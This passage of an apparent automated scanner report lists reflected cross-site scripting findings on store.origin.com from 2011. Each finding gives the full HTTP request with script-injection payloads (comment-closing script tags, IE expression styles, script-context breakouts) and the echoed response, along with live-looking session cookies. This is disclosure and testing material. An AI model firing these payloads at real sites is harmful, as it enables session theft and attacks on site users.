User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:15 GMT
Server: Apache/2.2.17
Content-Type: text/html
Content-Length: 68537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- DW6 -->
<head>

<title>PHUKET
...[SNIP]...
<input type="hidden" name="checkHotel[DestinationID]" value="7566605"><script>alert(1)</script>865efa0e996ad9f5c">
...[SNIP]...

4.84. http://store.origin.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 412c5--><script>alert(1)</script>d59f8e2efa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?412c5--><script>alert(1)</script>d59f8e2efa2=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=154926219549,0)
Date: Fri, 24 Jun 2011 13:44:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app49
Content-Length: 60544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308923040451:NODE=c2a4901:THREA
...[SNIP]...
<!--!esi:include src="/store?412c5--><script>alert(1)</script>d59f8e2efa2=1&Action=DisplayESIPage&Currency=USD&ESIHC=bf89624e&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage&script>
...[SNIP]...

4.85. http://store.origin.com/DRHM/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 26d07--><script>alert(1)</script>60365ea3b11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE&26d07--><script>alert(1)</script>60365ea3b11=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/DRHM/store%25253FAction%25253DContinueShopping%252526SiteID%25253Dea%252526Locale%25253Den_US%252526ThemeID%25253D718200%252526Env%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=142044730526,0)
Date: Fri, 24 Jun 2011 14:39:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 64955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926373194:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?26d07--><script>alert(1)</script>60365ea3b11=1&Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage"-->
...[SNIP]...

4.86. http://store.origin.com/servlet/ControllerServlet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /servlet/ControllerServlet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 970ec<x%20style%3dx%3aexpression(alert(1))>1e64672ebab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 970ec<x style=x:expression(alert(1))>1e64672ebab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /servlet/ControllerServlet?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=54552300&option=1&970ec<x%20style%3dx%3aexpression(alert(1))>1e64672ebab=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response (redirected)

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: VISITOR_ID=971D4E8DFAED4367E8FABBC8C336D7CFAFA20171532B684A; expires=Sat, 23-Jun-2012 20:31:09 GMT; path=/
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=116275073079,0)
Date: Fri, 24 Jun 2011 14:41:57 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 396


<!-- REQUEST ID: TIME=1308926517144:NODE=c2a4201:THREAD=47 -->
<!--!esi:include src="/store?970ec<x style=x:expression(alert(1))>1e64672ebab=1&Action=DisplayESIPage&Currency=USD&ESIHC=944044ed&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=173741100&cename=ProductFinder&id=ProductFinderLogicPage&objectID=54552300&option=1"-->
...[SNIP]...

4.87. http://store.origin.com/servlet/ControllerServlet [objectID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /servlet/ControllerServlet

Issue detail

The value of the objectID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7896e%3balert(1)//e97f0c45884 was submitted in the objectID parameter. This input was echoed as 7896e;alert(1)//e97f0c45884 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servlet/ControllerServlet?Action=DisplayPage&id=ProductFinderJSPage&Locale=en_US&SiteID=ea&objectID=545523007896e%3balert(1)//e97f0c45884 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response (redirected)

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=99095095834,0)
Date: Fri, 24 Jun 2011 14:40:10 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 6948


<!-- REQUEST ID: TIME=1308926410564:NODE=c2a4201:THREAD=36 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=173
...[SNIP]...

//document.getElementById("dr_load").style.display = "none";
loadMessage("off");
changeSelectState(false);
}
}
dataRequest(545523007896e;alert(1)//e97f0c45884,1);


<!--!/esi:include -->
...[SNIP]...

4.88. http://store.origin.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b9d22<x%20style%3dx%3aexpression(alert(1))>5630e67cca4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9d22<x style=x:expression(alert(1))>5630e67cca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /store?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=54552300&option=1&b9d22<x%20style%3dx%3aexpression(alert(1))>5630e67cca4=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=197879135792,0)
Date: Fri, 24 Jun 2011 14:36:47 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 398


<!-- REQUEST ID: TIME=1308926207827:NODE=c2a5301:THREAD=3806 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=d9487485&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&b9d22<x style=x:expression(alert(1))>5630e67cca4=1&ceid=172065900&cename=ProductFinder&id=ProductFinderLogicPage&objectID=54552300&option=1"-->
...[SNIP]...

4.89. http://store.origin.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7353c--><script>alert(1)</script>772938624bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage&7353c--><script>alert(1)</script>772938624bb=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253APRODUCTFINDERPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/en_US/AddItemToRequisition/ThemeID.718200%252526productID%25253D226783800%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=107684976519,0)
Date: Fri, 24 Jun 2011 14:39:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 26212


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926357939:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?7353c--><script>alert(1)</script>772938624bb=1&Action=DisplayESIPage&Currency=USD&ESIHC=f0fabaf3&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=ThreePgCheckoutShopping
...[SNIP]...

4.90. http://store.origin.com/store [objectID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The value of the objectID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 30c70%3balert(1)//bd42b8ad6f6 was submitted in the objectID parameter. This input was echoed as 30c70;alert(1)//bd42b8ad6f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /store?Action=DisplayPage&id=ProductFinderJSPage&Locale=en_US&SiteID=ea&objectID=5455230030c70%3balert(1)//bd42b8ad6f6 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21785430387,0)
Date: Fri, 24 Jun 2011 14:36:02 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 6952


<!-- REQUEST ID: TIME=1308926162482:NODE=c2a5301:THREAD=1735 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=1
...[SNIP]...

//document.getElementById("dr_load").style.display = "none";
loadMessage("off");
changeSelectState(false);
}
}
dataRequest(5455230030c70;alert(1)//bd42b8ad6f6,1);


<!--!/esi:include -->
...[SNIP]...

4.91. http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a9c7d--><script>alert(1)</script>84252b80866 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--><script>alert(1)</script>84252b80866=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.11.49:260-0#0"; JSESSIONID=7FD36F5B7EF2D6619ACFC964D7FBFAC2; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=822805002.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64731921166,0)
Date: Fri, 24 Jun 2011 13:44:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app49
Content-Length: 38619


<!-- REQUEST ID: TIME=1308923054923:NODE=c2a4901:THREAD=36 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=bf89624e&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&a9c7d--><script>alert(1)</script>84252b80866=1&ceid=173715400&cename=HomeTier3&id=HomeTier3Page&script>
...[SNIP]...

4.92. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 52629--><script>alert(1)</script>32e863371e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800?52629--><script>alert(1)</script>32e863371e0=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=172109476423,0)
Date: Fri, 24 Jun 2011 14:39:08 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 40166


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926348703:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?52629--><script>alert(1)</script>32e863371e0=1&Action=DisplayESIPage&Currency=USD&ESIHC=24e5cc79&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1476100&StyleVersion=12&ThemeID=718200&ceid=173716600&cename=TopHeader&id=ProductFinderPage&productID=219720
...[SNIP]...

4.93. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload be90c--><script>alert(1)</script>39260cc850a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800?be90c--><script>alert(1)</script>39260cc850a=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(1)%3C/script%3E84252b80866=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=129159595100,0)
Date: Fri, 24 Jun 2011 14:35:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 40083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926145188:NODE=c2a5301:THREA
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1476100&StyleVersion=12&ThemeID=718200&be90c--><script>alert(1)</script>39260cc850a=1&ceid=173716600&cename=TopHeader&id=ProductFinderPage&productID=226783800&script>
...[SNIP]...

4.94. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/pd/ThemeID.718200/productID.201797000

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cba28--><script>alert(1)</script>988e2a37d0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/pd/ThemeID.718200/productID.201797000?cba28--><script>alert(1)</script>988e2a37d0c=1 HTTP/1.1
Host: store.origin.com
